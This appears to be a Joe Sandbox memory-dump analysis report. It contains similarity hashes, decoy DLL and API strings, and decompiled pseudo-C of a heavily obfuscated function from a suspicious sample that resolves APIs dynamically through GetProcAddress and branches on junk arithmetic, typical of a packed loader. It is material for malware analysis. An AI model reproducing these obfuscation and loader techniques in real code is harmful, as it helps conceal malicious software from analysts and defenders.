Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: CNHI06S.DLL$CreateActCtxW$MXEAgent.dll$_v,$msobjs.dll$scavengeui.dll$sspicli.dll$yv
API String ID: 190572456-3071656586
Opcode ID: a86f07c74e9d204a338e52beeda92d0ef8cf02e06d776295dcef9bb67890af93
Instruction ID: 580930c93c58891ceded2c140fa355a7beb506bf0c785ab01b9e450aa5d9e9af
Opcode Fuzzy Hash: a86f07c74e9d204a338e52beeda92d0ef8cf02e06d776295dcef9bb67890af93
Instruction Fuzzy Hash: 74612575E042459FCB00DF79E8A82EE7BB1EF2A310F0481BBD94A97761E2390654CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0046C1CC Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 185libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?), ref: 0046C377

Strings

CreateActCtxW, xrefs: 0046C4A8
msmpeg2adec.dll, xrefs: 0046C2AB
jH, xrefs: 0046C2CC
sqlsrv32.dll, xrefs: 0046C3BF
mtxclu.dll, xrefs: 0046C33E
kO, xrefs: 0046C210
RegQueryInfoKeyW, xrefs: 0046C1F5
disrvpp.dll, xrefs: 0046C3AE

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: CreateActCtxW$RegQueryInfoKeyW$disrvpp.dll$jH$kO$msmpeg2adec.dll$mtxclu.dll$sqlsrv32.dll
API String ID: 190572456-3289093693
Opcode ID: a7f0ad6b684c2a024db39ba84818b2da22ab21515541137a45628ae1b73e9c70
Instruction ID: aae81f60164b2cbe34df60fc3fac493f869830facdecabd2a55b9caba812e1c6
Opcode Fuzzy Hash: a7f0ad6b684c2a024db39ba84818b2da22ab21515541137a45628ae1b73e9c70
Instruction Fuzzy Hash: BC71ED65E442458FCB00EFB9E8942E93BB2EF2A324B44817FC98597326E2390659C75D

Uniqueness

Uniqueness Score: -1.00%

Function 004B8B6B Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 180
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E004B8B6B(void* __eax, char* __ecx, signed int __edx, void* __edi, void* __esi) {
				signed int _t116;
				signed int _t117;
				_Unknown_base(*)()* _t118;
				signed int _t119;
				signed int _t120;
				void* _t121;
				char* _t122;
				signed int _t123;
				signed int _t124;
				signed int _t128;
				void* _t130;
				void* _t131;
				signed int _t134;
				char* _t136;
				signed int _t137;
				void* _t141;
				signed int _t144;
				signed int _t148;
				signed int _t156;
				void* _t158;
				signed int _t160;
				signed int _t161;
				signed int _t163;
				char _t164;
				signed int _t165;
				char* _t177;
				signed char _t178;
				signed int _t182;
				intOrPtr _t183;
				signed int _t191;
				char* _t193;
				intOrPtr _t202;
				signed int _t234;
				char* _t260;
				char* _t262;
				char* _t270;
				char* _t272;
				char* _t273;
				intOrPtr _t275;
				void* _t284;
				signed int _t292;
				signed int _t324;
				char* _t336;
				void* _t341;
				signed int _t342;
				char* _t355;
				char* _t357;
				char* _t358;
				signed char _t363;
				char* _t367;
				signed char _t371;
				intOrPtr _t403;
				signed int _t409;
				void* _t410;
				intOrPtr _t413;
				signed char _t422;
				signed int _t424;
				unsigned int _t443;
				short _t447;
				short _t463;
				signed int _t472;
				short _t475;
				signed int _t489;
				signed int _t496;
				intOrPtr _t564;
				void* _t567;
				void* _t574;
				void* _t575;
				signed int _t580;
				signed int _t581;
				void* _t583;
				void* _t585;
				signed int _t586;
				void* _t587;
				signed int _t589;
				intOrPtr _t595;
				void* _t597;
				signed int _t602;
				signed int _t610;
				void* _t611;
				short _t615;
				void* _t617;
				void* _t618;
				void* _t622;
				short _t623;
				signed int _t628;
				void* _t630;
				intOrPtr* _t633;
				void* _t635;
				signed int _t638;
				void* _t639;
				signed short _t642;
				signed int _t645;
				void* _t646;
				signed int _t650;
				signed short _t651;
				void* _t652;
				intOrPtr _t657;
				void* _t661;
				signed int _t663;
				void* _t665;

				_t567 = __edi;
				_t409 = __edx;
				_t336 = __ecx;
				asm("adc eax, 0x4fd22e");
				_t615 = __esi - 0xccef;
				_pop(_t116);
				if(__edi < 0) {
					_t567 = _t611 - 1;
					 *0x4fd0b2 =  *0x4fd0b2 + 0x243d62;
					__eflags = 0x487ac4;
					 *0x4fd14c = 0x7d41;
					_t336 = 0x7d41;
				}
				 *(_t665 - 8) = _t116;
				_t410 = _t409 - 0x96088e;
				 *0x4fd232 = _t615;
				_pop(_t617);
				 *0x4fff1b = _t116;
				_t618 = _t617;
				_t117 =  *(_t665 - 8);
				_push( *(_t665 - 0x18));
				_push(_t618);
				 *0x4fff19 = _t117;
				 *0x4fd71f =  *0x4fd71f + (_t567 - 0x0000ceb5 + 0x00bd2355 | 0x0000e215);
				__eflags = _t117 - 0xcc795;
				if(_t117 <= 0xcc795) {
					L113:
					 *0x4fd190 = 0x74bf;
					_t410 = 0x9c2b;
					 *0x4febd7 =  *0x4febd7 - 0x9c2b;
					_t202 =  *0x4fdbc7; // 0x382596
					__eflags = _t202 - _t202;
					if(_t202 >= _t202) {
					}
					__eflags = 0;
					_t336 = 0x6ef3;
				} else {
					__eflags = _t117 - 0x1aec19;
					if(_t117 != 0x1aec19) {
						goto L113;
					}
				}
				_t413 = _t410 + 0xa1;
				 *0x4fd22e = 0xffffffffffff2db0;
				 *0x4fff1d = _t117;
				_pop(_t622);
				_push( *((intOrPtr*)(_t665 - 0x20)));
				_t623 = _t622;
				_t118 = GetProcAddress(??, ??);
				_push(_t118);
				 *0x4fff19 = _t118;
				__eflags = _t118;
				if(_t118 < 0) {
					L122:
					goto L123;
				} else {
					__eflags = _t623;
					if(_t623 > 0) {
						 *0x4fff1d =  *0x4fff1d - _t118;
						__eflags =  *0x4fff1d;
					}
					_t191 =  *0x4fff1e; // 0x3
					 *0x4fd024 =  *0x4fd024 - _t191;
					 *0x4fd5df =  *0x4fd5df + _t191;
					__eflags = 0xf4 - 0x2b35;
					if(0xf4 == 0x2b35) {
						L123:
						 *0x4fd16c = _t336;
						_t336 = 0;
						_t413 = _t413 + 0x7b9bc4;
						_t119 =  *0x4fff19; // -107
						 *0x4fff1b = _t119;
						_t120 = _t119;
						 *0x4fff1e = _t120;
						_t121 = _t120 + _t120;
						__eflags = _t121 - 0x1279c2;
						if(_t121 != 0x1279c2) {
							 *0x4fd072 =  *0x4fd072 - _t121;
							__eflags =  *0x4fd072;
						}
					} else {
						__eflags = 0xf4 - 0x3c;
						if(0xf4 > 0x3c) {
							__eflags = 0x1e8;
							goto L122;
						}
					}
				}
				_pop(_t122);
				 *0x4fd196 = _t413;
				 *0x4fd22e = _t623;
				_push( *((intOrPtr*)(_t665 - 0x14)));
				__eflags = _t122;
				if(_t122 > 0) {
					 *0x4fff10 =  &(_t122[ *0x4fff10]);
					__eflags =  *0x4fff10;
					 *0x4fd573 = _t122;
				}
				 *(_t665 - 8) = _t122;
				_pop(_t574);
				 *0x4fff19 = _t122;
				_t123 =  *(_t665 - 8);
				 *__edi = _t123;
				 *0x4fd83f = _t123;
				_t575 = _t574;
				 *0x4fff1b = _t123;
				_push(_t575 + 4);
				 *0x4fd893 = _t123;
				 *0x4fdf97 = 0x177d5f;
				_t340 = 0;
				_t124 = _t123;
				_pop(_t580);
				 *((intOrPtr*)(_t665 - 0x14)) = 0x4fd74b;
				 *(_t665 - 8) = _t124;
				__eflags = 0xbb430b;
				if(0xbb430b > 0) {
					 *0x4fff1d = _t124;
				}
				 *(_t665 - 0xc) =  *(_t665 - 8);
				_t234 = "MXEAgent.dll" + "MXEAgent.dll";
				_t341 = _t340 - 0x75;
				 *(_t665 - 8) =  *(_t665 - 0xc);
				_t422 = 0xa52b;
				_t128 =  *(_t665 - 8);
				__eflags = _t128 - 0x858ec;
				if(_t128 <= 0x858ec) {
					__eflags = _t128 - 0x167d70;
					if(_t128 == 0x167d70) {
						 *0x4fd082 =  *0x4fd082 + _t128;
						__eflags =  *0x4fd082;
					}
					__eflags = _t234;
				}
				 *0x4fd132 =  *0x4fd132 - _t341;
				_t628 =  *(_t665 - 0x10);
				 *0x4fff1d = _t128;
				_push(_t628);
				 *0x4fff1b = _t128;
				 *0x4fff1b = _t128;
				_t630 = _t628 - 0xaebc5c;
				_t130 = _t128;
				_t581 = _t580 & 0x0000f7e6;
				_push(_t130);
				_t131 = L004618E3(_t130, _t130 - 0x1233ce, _t341, _t422, _t581, _t630, _t130, 1);
				_push(_t131);
				L0045F957(_t131, _t630);
				_t134 = _t131;
				__eflags = _t422 & 0x0000008b;
				if((_t422 & 0x0000008b) == 0) {
					_t422 = 0x4fff18;
					 *0x4fff19 = 0xe4;
					 *0x4fff1d = _t134;
					_t581 = _t581 + 0xa2c29;
					__eflags = _t581;
				}
				 *0x4fd0d6 =  *0x4fd0d6 + 0x3499b6;
				 *0x4fd226 =  *0x4fd226 - _t630;
				_t633 = _t134;
				_t136 =  *_t633;
				__eflags = _t341 - _t341;
				if(_t341 >= _t341) {
					_t341 = _t341 - 0x75d0;
					 *0x4fd1c8 = _t422;
					 *0x4fff1b = _t136;
					_t581 = _t581 + _t633;
					__eflags = 0x349a8e;
				}
				 *0x4fff1d = _t136;
				 *(_t665 - 8) = _t136;
				_t635 = _t633;
				_t137 =  *(_t665 - 8);
				_t424 = 4;
				_t342 = _t341 + 0x61;
				_push(_t635 + 6);
				 *0x4fff1b = _t137;
				_t583 = _t581 + _t581 + 0xce0cae;
				_pop(_t638);
				 *(_t665 - 0x10) = _t638;
				__eflags = _t137;
				if(__eflags != 0) {
					asm("bt eax, 0x1f");
					if(__eflags >= 0) {
						_push(_t638);
						__eflags = _t638 & 0x00a22c19;
						if((_t638 & 0x00a22c19) < 0) {
							L89:
							 *0x4fd1fc = _t424 - 0x99;
							_t424 = 0;
							__eflags = 0;
							L90:
							__eflags = _t638 + 0xb1407d;
							L91:
							 *0x4fff1b = _t137;
							_t292 = _t137;
							L92:
							_pop(_t661);
							_t177 = _t137 +  *((intOrPtr*)(_t665 + 8));
							 *(_t665 - 8) = _t177;
							 *0x4fd19e = _t424;
							_t663 = _t661;
							 *0x4fff19 = _t177;
							_t583 = _t583 - 0xe52c + 0xf4f0 + _t663;
							_t178 =  *0x4fff1b;
							__eflags = _t178 & _t178;
							if((_t178 & _t178) >= 0) {
								_t583 = _t583 + _t583;
								__eflags =  !0x002E66F0 -  !0x002E66F0;
								if( !0x002E66F0 >=  !0x002E66F0) {
									__eflags =  !0x002E66F0 -  !0x002E66F0;
									if( !0x002E66F0 >  !0x002E66F0) {
										_t342 = _t342 + 0x64;
										__eflags = _t342;
										 *0x4fd16e = _t342;
									}
									_t564 =  *0x4fd1a0;
									 *0x4fff17 =  *0x4fff17 - _t564;
									 *0x4fff18 =  *0x4fff18 + _t564;
									__eflags = _t564 + _t564;
								}
								 *0x4fff1d = 0xbd;
							}
							_t424 = 2;
							_t182 =  &(( *(_t665 - 8))[3]);
							__eflags = _t182;
							L99:
							_t610 = _t583 + 0xf30c;
							_push(_t663);
							 *0x4fff1b = _t182;
							__eflags = _t663;
							if(_t663 >= 0) {
								__eflags = _t610;
								if(_t610 < 0) {
									 *0x4fff1e =  *0x4fff1e + _t182;
									__eflags =  *0x4fff1e;
								}
								 *0x4fdf4b = 0x3937bc;
								_t342 = (_t342 ^ 0x005580c5) - 0x63a549;
								_t424 = 0xffffffffffff6197;
								__eflags = 0xffffffffffff6197;
							}
							 *0x4fd230 = _t424;
							__eflags = _t182 & 0x000000b9;
							if((_t182 & 0x000000b9) != 0) {
								L106:
								 *0x4fdd23 =  !0x24f0d4;
								_t342 = 0;
								__eflags = _t424 + 0x8a;
								_t424 = _t182;
								goto L107;
							} else {
								__eflags = _t663 - 0xb16e22;
								if(_t663 - 0xb16e22 < 0) {
									L107:
									_pop(_t615);
									 *(_t665 - 0x18) = _t182;
									 *0x4fff10 =  *0x4fff10 + _t182;
									__eflags = _t182 - 0x1b7bac;
									if(_t182 < 0x1b7bac) {
										 *0x4fff15 =  *0x4fff15 - _t342;
										__eflags = _t342 + _t342;
									}
									_push(_t615);
									 *0x4fff1b = _t182;
									_t611 = _t610 + 0xf829;
									_t183 = _t182;
									 *0x4fd4d7 = _t183;
									_t116 = _t183;
									_push(_t116);
									_push(0);
									_push(1);
									_push(1);
									_push(0x4b8b69);
									_t409 = E004A3550;
									goto __edx;
								}
								_t610 = _t610 + _t610 | 0x000000f9;
								 *0x4fd58f = _t182;
								__eflags = 0xf9 + _t182;
								goto L106;
							}
						}
						 *0x4fff1d = _t137;
						 *0x4fff1d = _t137;
						_t324 = _t137;
						_t583 = _t583 - 0x7805;
						__eflags = _t137 - 0x104a;
						if(_t137 > 0x104a) {
							goto L90;
						}
						_t292 = _t324 + _t137;
						__eflags = _t137 - 0x27f1;
						if(_t137 > 0x27f1) {
							L87:
							_t342 = 0x5f22;
							__eflags = 0x5f22 - 0x5f22;
							if(0x5f22 >= 0x5f22) {
								goto L91;
							}
							_t342 = 0;
							_t424 = _t424 + 0x89;
							__eflags = _t424;
							goto L89;
						}
						__eflags = 0 - 0x37b6;
						if(0 != 0x37b6) {
							goto L92;
						}
						 *0x4fff14 =  *0x4fff14 + _t292;
						__eflags =  *0x4fff14;
						goto L87;
					}
					_t663 = _t638;
					_t182 = _t137 & 0x0000ffff;
					goto L99;
				}
				 *0x4fff1e = _t137;
				_t255 =  *0x4fff1e;
				 *(_t665 - 8) = _t137;
				_t585 = _t583;
				_t426 = 0x8e7e;
				_t639 = _t638 + _t638;
				 *0x4fff1b = 0xc9;
				 *0x4fff1d = 0xc9;
				 *0x4fd45f =  *0x4fff1d;
				_t141 = 0xe2;
				_t586 = _t585;
				__eflags = _t586;
				if(_t586 < 0) {
					 *0x4fd052 =  *0x4fd052 + 0x4fff0f;
					_t141 = 0x4fff25;
					_t255 = "ehshell.dll";
					 *0x4fdf9b = "ehshell.dll";
					 *0x4fd186 = _t342;
					_t426 = 0x175b75a;
					__eflags = 6;
				}
				_push(_t586);
				E004AB557(_t141, _t255, _t342, _t426, _t586, _t639, _t586);
				__eflags = _t586;
				if(_t586 <= 0) {
				}
				 *0x4fe8df =  *0x4fe8df - _t426;
				 *0x4fd1fe = _t426;
				_pop(_t587);
				_t144 =  *(_t665 - 8);
				_t409 = 0;
				_t615 = _t639 + 1;
				 *0x4fff1b = _t144;
				 *0x4fd3b7 =  *0x4fd3b7 + _t587;
				 *(_t665 - 8) =  *(_t665 - 0x1c);
				_t260 =  *(_t665 - 8);
				 *0x4fff14 =  &(_t260[ *0x4fff14]);
				 *0x4fde83 = _t260;
				 *(_t665 - 8) = _t260;
				 *0x4fe3b3 =  *0x4fe3b3 - 0x650c;
				_t148 = _t144;
				_t589 = _t587;
				_t262 =  &(( *(_t665 - 8))[0x14]);
				__eflags = _t589;
				if(_t589 == 0) {
					 *0x4fd33b =  *0x4fd33b - _t148;
					__eflags =  *0x4fd33b;
				}
				_push(_t589);
				 *0x4fff1e = _t148;
				 *(_t665 - 8) = _t262;
				_t336 = 0x1d6301;
				 *(_t665 - 0xc) = _t148;
				__eflags = _t589;
				if(_t589 < 0) {
					L138:
					_t152 =  *0x4fff1b;
				} else {
					_t152 = 0;
					 *0x4fdf17 =  *0x4fdf17 + 0x3effe9;
					_t403 =  *0x4fd146;
					 *0x4fff16 =  *0x4fff16 - _t403;
					_t336 = _t403 + _t409;
					__eflags = _t409 & 0x007ea43d;
					if((_t409 & 0x007ea43d) > 0) {
						_t409 =  !0xa4db;
						 *0x4fff19 = 0;
						goto L138;
					}
				}
				 *0x4fff1d = _t152;
				_t116 =  *(_t665 - 0xc);
				_t193 =  *(_t665 - 8);
				_pop(_t567);
				 *(_t665 - 0x1c) = _t193;
				 *(_t665 - 8) = _t336;
				_t355 = _t336;
				_push(_t193);
				if(_t567 != 0) {
					 *0x4fd51f = _t116;
					_t193 = _t193 - _t116;
				}
				if( &(_t193[0x296a7f]) == 0x37) {
					 *0x4fe28f =  *0x4fe28f - _t355;
				}
				_t357 =  *(_t665 - 8);
				 *(_t665 - 8) =  *(_t665 - 0x1c);
				if(_t357 < _t357) {
					 *0x4fe68b =  *0x4fe68b + 0x7845;
					 *0x4fff19 =  *0x4fff19 + _t116;
				}
				if(_t116 <= 0) {
					 *0x4fff1d =  *0x4fff1d - _t116;
				}
				_t156 = _t116;
				 *0x4fff10 = _t156;
				_t158 = _t156;
				_t160 = _t158;
				_t358 = _t357;
				_t270 =  *(_t665 - 8);
				_push(_t270[0x10]);
				 *(_t665 - 8) = _t270;
				 *0x4fd168 = _t358;
				 *0x4fff18 =  *0x4fff18 - 0xc7;
				 *0x4fff18 =  *0x4fff18 - 0xc7;
				_t642 = _t615 - 0xb6f6c2 + _t615 - 0xb6f6c2;
				_pop(_t595);
				_t272 =  *(_t665 - 8);
				 *((intOrPtr*)(_t665 - 0x14)) = _t595;
				if(_t595 != 0) {
					 *0x4fff10 = _t160;
					_t438 = 0x21044c;
					 *(_t665 - 8) = _t358;
					 *0x4fd13c = _t358;
					if(_t358 >= _t358) {
						L13:
						 *0x4fdef7 = _t272;
						if(_t358 < _t358) {
							L16:
							_t438 = _t438 + 0xa402;
							 *0x4fd22a = _t642;
							if(_t642 + _t642 < 0) {
								L18:
								 *0x4fd537 = _t160;
								_t363 =  *(_t665 - 8);
								_push( *_t272);
								if(_t160 < 9) {
									L25:
									L26:
									_t443 =  *0x4fd168;
									_pop(_t645);
									 *(_t665 - 0x10) = _t645;
									if(_t645 == 0) {
										if(((_t443 >> _t363) - _t363 + 0x0000007d & 0x0000008d) < 0) {
											 *0x4fff1b = _t160;
										}
										 *0x4fff1d =  *0x4fff1d - _t160;
										_t657 =  *((intOrPtr*)(_t665 - 0x14));
										 *(_t665 - 8) = _t363;
										 *0x4fd1f8 = 0x8cd4;
										 *0x4fedf3 =  *0x4fedf3 - _t657;
										_t284 = _t272;
										_t272 = _t284;
										_t160 = _t160;
										_t595 = _t595;
										_t645 = _t657;
										_t363 =  *(_t665 - 8);
										 *(_t665 - 0x10) = _t645;
									}
									 *(_t665 - 8) = _t363;
									 *0x4fff1e = _t160;
									_t646 = _t645;
									_t367 =  *(_t665 - 8);
									 *0x4fd164 = _t367;
									_t447 =  &(( &(_t367[ !( *0x4fd7b3)]))[0x86f4]);
									 *0x4fff18 =  *0x4fff18 - _t447;
									 *0x4fd1fc = _t447;
									 *0x4fff1b = _t160;
									_push( *((intOrPtr*)(_t665 + 8)));
									 *0x4fff10 = _t160;
									 *(_t665 - 8) = _t367;
									_t161 = _t160;
									_t597 = _t646;
									 *((intOrPtr*)(_t665 - 0x14)) =  *((intOrPtr*)(_t665 - 0x14)) + _t597;
									 *0x4fd1c8 = 0x37b493;
									_push( *((intOrPtr*)(_t665 + 8)));
									 *(_t665 - 8) = _t272;
									_push( *(_t665 - 8));
									 *0x4fd1ce = 0xffffffffffff913e;
									 *0x4fd1e8 = 0xffffffffffff913e;
									_t463 = 0xaf1d;
									 *(_t665 - 0xc) = _t161;
									_pop(_t371);
									_t163 =  *(_t665 - 0xc);
									_t273 =  *(_t665 - 8);
									_t602 = _t597;
									_pop(_t650);
									 *(_t665 - 0x10) =  *(_t665 - 0x10) + _t650;
									if(_t602 == 0) {
										_t463 = _t163 - 0x17;
										if(_t163 >= 0x1f00) {
											if(_t273 >= 0x310513) {
												 *0x4fd17c =  *0x4fd17c + _t371;
												 *0x4fff16 =  *0x4fff16 - 0x24;
											}
											 *0x4fff19 =  *0x4fff19 + _t163;
											 *0x4fff1d = _t163;
											_t463 = 0xd0 - _t602 + 0xf8 - 0x865;
											 *0x4fd55b = _t163;
											if(_t163 <= 0x1829) {
												if(_t163 <= 0x23d06e) {
													 *0x4fd0ae =  *0x4fd0ae + _t273;
												}
												 *0x4fdcf3 = _t273;
												_t463 =  *0x4fdf43 - 0x60;
											}
										}
									}
									if(_t371 < _t371) {
										_t463 =  *0x4fd196 + 0x868b;
										 *0x4fff18 =  *0x4fff18 + _t463;
									}
									 *0x4fd1fc = _t463;
									_t164 = _t273[0xc];
									 *0x4fd75f = _t164;
									_t165 = _t164 +  *((intOrPtr*)(_t665 + 8));
									while(1) {
										 *0x4fd547 = _t165;
										 *(_t665 - 8) = _t371;
										 *0x4fd162 = _t371;
										_t472 =  *0x4fff1e - _t165 + 0x58 - 0x90;
										 *0x4fd1e2 = _t472;
										if((_t472 & 0x008d5f27) <= 0) {
											goto L45;
										}
										_t475 = _t472 + 0xad65;
										 *0x4fff1b = _t165;
										 *0x4fff1b = _t165;
										if(_t602 != 0 || _t165 < 0x2085) {
											L46:
											 *0x4fff19 = _t165;
											_t371 =  *(_t665 - 8);
											if( *_t165 != 0) {
												 *0x4fd1d6 = _t475;
												_push(_t650);
												__eflags = _t650;
												if(_t650 != 0) {
													L57:
													__eflags =  !0x371105 - _t371 + _t371 + 0x6cb4;
													L58:
													 *0x4fd1aa = _t371;
													_pop(_t651);
													 *(_t665 - 0x18) = _t165;
													 *(_t665 - 8) = _t273;
													_t489 = 0x76ad;
													_push(_t651);
													__eflags = _t651 & 0x0000b5c1;
													if((_t651 & 0x0000b5c1) > 0) {
														L63:
														_t275 = _t273 - _t602 - 0xea;
														__eflags = _t602;
														if(_t602 >= 0) {
															 *0x4fff10 = _t165;
														}
														__eflags = _t165 - 0xa;
														if(_t165 >= 0xa) {
															_t275 = 0x177538;
															__eflags = 0x177537;
														}
														 *0x4fdae3 = _t275;
														L68:
														_pop(_t652);
														_push( *(_t665 - 0x18));
														_push(_t652);
														_push(_t602);
														 *(_t665 - 8) = _t371;
														 *0x4ff7f8 =  *0x4ff7f8 - _t652 + 0xc0c6;
														 *0x4fff1d = _t165;
														_push( *(_t665 - 8));
														 *0x4fff1b = _t165 - _t165;
														 *0x4fff1e = 0xda;
														 *0x4fd89b = "rdpwsx.dll";
														_t340 =  *(_t665 - 8);
														 *0x4fd186 =  *(_t665 - 8);
														_pop(_t124);
														_t580 = _t165;
														_pop(0xbb430b);
														_push(0x4b87ca);
														goto ( *0x4fe0e7);
													}
													 *0x4fff1d = _t165;
													 *0x4fff10 =  *0x4fff10 - _t165;
													_t273 = _t165 - 0x14e91 + _t165;
													__eflags = _t165 - 0x28e1;
													if(_t165 >= 0x28e1) {
														_t273 = "KBDBGPH.DLL";
														 *0x4fde3f = _t273;
														 *0x4fd166 = _t371;
														_t489 =  *0x4fd116 + _t371;
														__eflags = _t489;
													}
													_t496 = _t489 + _t489 + 0x8f60;
													 *0x4fd1fe = _t496;
													_t489 = _t496 & 0x009ce042;
													__eflags = 0xffffffffff5c0d7c;
													if(0xffffffffff5c0d7c > 0) {
														goto L68;
													} else {
														 *0x4fff1b = _t165;
														goto L63;
													}
												}
												__eflags = _t602;
												if(_t602 > 0) {
													goto L58;
												}
												__eflags = "psapi.dll" - _t165;
												goto L57;
											}
											if(_t371 != _t371) {
												L50:
												if(_t650 >= 0) {
												}
												L53:
												 *0x4fd040 =  *0x4fd040 - _t165;
												 *0x4fd056 =  *0x4fd056 - _t165;
												_t165 = _t165 + 1;
												continue;
											}
											if(0x7156 >= 0) {
												goto L53;
											}
											_t475 = 0x10272;
											 *0x4fff19 = _t165;
											goto L50;
										} else {
										}
										L45:
										 *0x4fd198 =  *0x4fd198 + 0x6f5d;
										 *0x4fd1b2 =  *0x4fd1b2 + _t472;
										_t475 = 0xae71;
										goto L46;
									}
								}
								 *0x4fd166 = _t363;
								if((_t363 & 0x00000082) > 0) {
									 *0x4fff1b = _t160;
								}
								if(_t160 == 0) {
									 *0x4fff10 = _t160;
								}
								if(_t160 < 0x1ea165) {
									goto L26;
								} else {
									 *(_t665 - 8) = _t363;
									goto L25;
								}
							}
							L17:
							 *0x4fd6f1 =  *0x4fd6f1 - _t595;
							goto L18;
						}
						if( &(_t358[0x6e]) >=  &(_t358[0x6e])) {
							goto L18;
						}
						_t438 = _t438 - 0x84f3ca;
						goto L16;
					}
					 *0x4fd1d6 = 0x9df5f4;
					_t438 = 0xaad9;
					if((_t642 & 0x0000ba9e) > 0) {
						goto L17;
					}
					_t642 = _t642 + 0xbc95fd;
					 *0x4fff1e = _t160;
					 *0x4fd7f7 = _t160;
					_t358 = "Microsoft.Build.Engine.dll" - _t160 + 0x3018af - 0x4565;
					goto L13;
				}
				asm("popad");
				return _t160;
			}

0x004b8b6b
0x004b8b6b
0x004b8b6b
0x004b8b6b
0x004b8b75
0x004b8b7a
0x004b8b7d
0x004b8b81
0x004b8b94
0x004b8b9b
0x004b8ba4
0x004b8bab
0x004b8bab
0x004b8bad
0x004b8bb0
0x004b8bb6
0x004b8bc0
0x004b8bc7
0x004b8bcd
0x004b8bd7
0x004b8bda
0x004b8bed
0x004b8bee
0x004b8c01
0x004b8c0a
0x004b8c0f
0x004b8c18
0x004b8c30
0x004b8c41
0x004b8c45
0x004b8c4b
0x004b8c51
0x004b8c53
0x004b8c53
0x004b8c5a
0x004b8c5c
0x004b8c11
0x004b8c11
0x004b8c16
0x00000000
0x00000000
0x004b8c16
0x004b8c63
0x004b8c66
0x004b8c77
0x004b8c7e
0x004b8c7f
0x004b8c8a
0x004b8c8b
0x004b8c9b
0x004b8c9c
0x004b8ca2
0x004b8ca4
0x004b8cd8
0x00000000
0x004b8ca6
0x004b8ca6
0x004b8ca9
0x004b8cab
0x004b8cab
0x004b8cab
0x004b8cb5
0x004b8cbb
0x004b8cc2
0x004b8cca
0x004b8ccf
0x004b8cdd
0x004b8cdd
0x004b8ce4
0x004b8ce7
0x004b8cf0
0x004b8cf6
0x004b8cfc
0x004b8d03
0x004b8d08
0x004b8d0a
0x004b8d0f
0x004b8d11
0x004b8d11
0x004b8d11
0x004b8cd1
0x004b8cd1
0x004b8cd4
0x004b8cd6
0x00000000
0x004b8cd6
0x004b8cd4
0x004b8ccf
0x004b8d29
0x004b8d2d
0x004b8d39
0x004b8d4a
0x004b8d4b
0x004b8d4d
0x004b8d54
0x004b8d54
0x004b8d5a
0x004b8d5f
0x004b8d65
0x004b8d6b
0x004b8d6c
0x004b8d75
0x004b8d79
0x004b8d87
0x004b8d8c
0x004b8da3
0x004b8db1
0x004b8dc2
0x004b8dd2
0x004b8dd8
0x004b8de3
0x004b8dee
0x004b8def
0x004b87db
0x004b87e0
0x004b87e3
0x004b87e5
0x004b87e5
0x004b87ed
0x004b8809
0x004b880e
0x004b8811
0x004b8814
0x004b8817
0x004b881a
0x004b881f
0x004b8821
0x004b8826
0x004b8828
0x004b8828
0x004b8828
0x004b882f
0x004b882f
0x004b883c
0x004b8843
0x004b8846
0x004b8854
0x004b885b
0x004b8866
0x004b886c
0x004b8870
0x004b8871
0x004b887f
0x004b8885
0x004b888a
0x004b888c
0x004b88a1
0x004b88a2
0x004b88a5
0x004b88a7
0x004b88ad
0x004b88b8
0x004b88bf
0x004b88bf
0x004b88bf
0x004b88cc
0x004b88d4
0x004b88e8
0x004b88eb
0x004b88ec
0x004b88ef
0x004b88f1
0x004b88f6
0x004b8904
0x004b890a
0x004b890c
0x004b890c
0x004b8913
0x004b891c
0x004b8922
0x004b8923
0x004b892b
0x004b8936
0x004b8939
0x004b8941
0x004b8949
0x004b894f
0x004b8950
0x004b8953
0x004b8955
0x004b895b
0x004b895f
0x004b8972
0x004b8973
0x004b8979
0x004b89bf
0x004b89c2
0x004b89c9
0x004b89c9
0x004b89cd
0x004b89cd
0x004b89d3
0x004b89d3
0x004b89d9
0x004b89db
0x004b89e5
0x004b89e6
0x004b89f7
0x004b89fa
0x004b8a04
0x004b8a05
0x004b8a0b
0x004b8a0e
0x004b8a14
0x004b8a16
0x004b8a18
0x004b8a2f
0x004b8a32
0x004b8a34
0x004b8a37
0x004b8a39
0x004b8a39
0x004b8a3c
0x004b8a3c
0x004b8a43
0x004b8a4a
0x004b8a50
0x004b8a56
0x004b8a56
0x004b8a5a
0x004b8a5a
0x004b8a6f
0x004b8a72
0x004b8a72
0x004b8a74
0x004b8a74
0x004b8a79
0x004b8a7a
0x004b8a80
0x004b8a82
0x004b8a84
0x004b8a87
0x004b8a89
0x004b8a89
0x004b8a8f
0x004b8aa5
0x004b8ab1
0x004b8abc
0x004b8abc
0x004b8abc
0x004b8ac1
0x004b8ac8
0x004b8acb
0x004b8ae6
0x004b8aed
0x004b8b01
0x004b8b04
0x004b8b07
0x00000000
0x004b8acd
0x004b8ad3
0x004b8ad5
0x004b8b0a
0x004b8b10
0x004b8b11
0x004b8b14
0x004b8b1c
0x004b8b21
0x004b8b30
0x004b8b36
0x004b8b36
0x004b8b3c
0x004b8b3d
0x004b8b44
0x004b8b49
0x004b8b4a
0x004b8b53
0x004b8b56
0x004b8b57
0x004b8b59
0x004b8b5b
0x004b8b5d
0x004b8b62
0x004b8b67
0x004b8b67
0x004b8add
0x004b8adf
0x004b8ae4
0x00000000
0x004b8ae4
0x004b8acb
0x004b8981
0x004b8986
0x004b898b
0x004b898d
0x004b8993
0x004b8997
0x00000000
0x00000000
0x004b8999
0x004b899b
0x004b899f
0x004b89b0
0x004b89b0
0x004b89b4
0x004b89b7
0x00000000
0x00000000
0x004b89b9
0x004b89bc
0x004b89bc
0x00000000
0x004b89bc
0x004b89a1
0x004b89a6
0x00000000
0x00000000
0x004b89a8
0x004b89a8
0x00000000
0x004b89a8
0x004b8967
0x004b8968
0x00000000
0x004b8968
0x004b8df9
0x004b8e08
0x004b8e0e
0x004b8e18
0x004b8e19
0x004b8e1b
0x004b8e1f
0x004b8e25
0x004b8e32
